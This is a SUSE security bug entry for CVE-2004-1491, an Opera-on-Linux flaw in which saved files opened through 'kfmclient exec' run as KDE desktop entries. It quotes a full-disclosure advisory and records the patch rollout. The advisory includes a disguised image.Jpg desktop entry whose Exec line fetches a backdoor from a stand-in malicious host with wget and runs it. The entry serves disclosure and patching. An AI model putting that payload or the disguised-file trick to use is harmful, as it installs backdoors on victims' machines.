Bug 64218 (CVE-2004-1491)

Summary: VUL-0: CVE-2004-1491: opera - trick user into running arbitrary commands
Product: [Novell Products] SUSE Security Incidents Reporter: Ludwig Nussel <lnussel>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Major    
Priority: P3 - Medium CC: christian.westgaard, security-team
Version: unspecified   
Target Milestone: ---   
Hardware: All   
OS: Linux   
Whiteboard: CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Found By: Other Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Ludwig Nussel 2004-12-14 21:10:20 UTC 
We received the following report via full-disclosure.
The issue is public.

Date: Mon, 13 Dec 2004 18:05:14 +0000
From: Giovanni Delvecchio <badpenguin79@hotmail.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] [ZH2004-19SA]Possible execution of remote shell
	commands in Opera with kfmclient
Reply-To: badpenguin@zone-h.org

Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org

Tested version:
Opera 7.54 linux version with Kde 3.2.3

Original advisory: http://zone-h.org/en/advisories/read/id=6503/


Problem:
=======
Opera for linux uses "kfmclient exec" as "Default Application" to handle
saved files.
This could be used by malicious remote users to execute arbitrary shell
commands on a target system.
Indeed, the command "kfmclient exec" could be used to open a "Kde Desktop 
Entry" and therefore execute the command within the "Exec=" entry.

Example of [KDE Desktop Entry]:

________________________________

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec="Any arbitrary command"
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0
______________________________


Possible method of Exploitation
=========================

This method of exploitation needs that a particular file name extension
is used.
If page.Htm is used as file name and "kfmclient exec page.Htm" is opened , 
the command in "Exec=" entry will be executed.
Instead, If "page.htm" is used as file name, it will not be opened like a 
"kde desktop entry" but it will be viewed in konqueror.
It works also with Jpg,Gif etc.. , but not with jpg,gif..extension, since
the "system" is case sensitive.

Attack scenario:

1- A user clicks on a link which requires http://malicious_server/image.Jpg

2- malicious_server responds with an unknown Content-Type field , for
example Content-Type: image/Jpeg. (note the dot at the end), so Opera will 
show a dialog window.

3- if a user chooses "Open" to view image.Jpg, it will be opened by
"kfmclient exec" command, since kfmclient is the "Default Application"

4- Image.Jpg is a kde desktop entry :

--------image.Jpg----------

# KDE Config File
[KDE Desktop Entry]
SwallowExec=
SwallowTitle=
BinaryPattern=
MimeType=
Exec=/bin/bash -c 
wget\thttp://malicious_site/backdoor;chmod\t777\tbackdoor;./backdoor
Icon=
TerminalOptions=
Path=
Type=Application
Terminal=0

---- end of image.Jpg-------

Note: \t is an horizontal tab.
In this case a backdoor will be downloaded on victim's computer and 
executed.


Solution:
========
Disable "kfmclient exec" as default application

_________________________________________________________________
Ricerche online piĆ¹ semplici e veloci con MSN Toolbar! 
http://toolbar.msn.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Comment 1 Lukas Tinkl 2005-01-03 20:11:28 UTC 
I'll talk to our Opea contact
Comment 2 Lukas Tinkl 2005-01-06 00:19:17 UTC 
Waiting for answer from "Espen Sand" <espen@opera.com>
Comment 3 Ludwig Nussel 2005-01-18 21:23:12 UTC 
any news? Did you check whether the report is valid at all?
Comment 4 Lukas Tinkl 2005-01-30 17:47:45 UTC 
It is confirmed and I still got no reply from Opera; I'll go and find a solution
myself.
Comment 5 Ludwig Nussel 2005-01-31 17:04:17 UTC 
NEEDINFO is wrong as it refers to the reporter and I cannot provide the 
information you need.
Comment 6 Christian Westgaard 2005-02-03 21:54:07 UTC 
You may set default filehandler in
/usr/share/opera/ini/filehandler.ini

Or per user in (created on firstrun)
~/.opera/filehandler.ini (aka $OPERA_DIR/filehandler.ini)
Comment 7 Lukas Tinkl 2005-02-10 21:23:48 UTC 
Fixed package submitted to stable
Comment 8 Thomas Biege 2005-03-09 12:17:57 UTC 
Lukas,
please submit packages for older distributions too.

The "VUL-0" tag means that all supported versions need an update.

Thanks.
Comment 9 Lukas Tinkl 2005-03-09 13:13:48 UTC 
OK, down to what version?
Comment 10 Thomas Biege 2005-03-09 13:18:59 UTC 
8.2
Comment 11 Thomas Biege 2005-03-09 13:38:41 UTC 
CAN-2004-1491

SM-Tracker-578
Comment 12 Marcus Meissner 2005-03-14 14:09:24 UTC 
8.2 version is still missing ....  
 
 
patchinfo is missing
Comment 13 Thomas Biege 2005-03-14 14:14:06 UTC 
please reassign to security-team when done. we'll submit patchinfo files then.
Comment 14 Lukas Tinkl 2005-03-14 14:46:16 UTC 
Reassigning, 8.2 submitted
Comment 15 Marcus Meissner 2005-03-16 16:22:06 UTC 
fixed packages released.
Comment 16 Thomas Biege 2009-10-13 20:04:41 UTC 
CVE-2004-1491: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)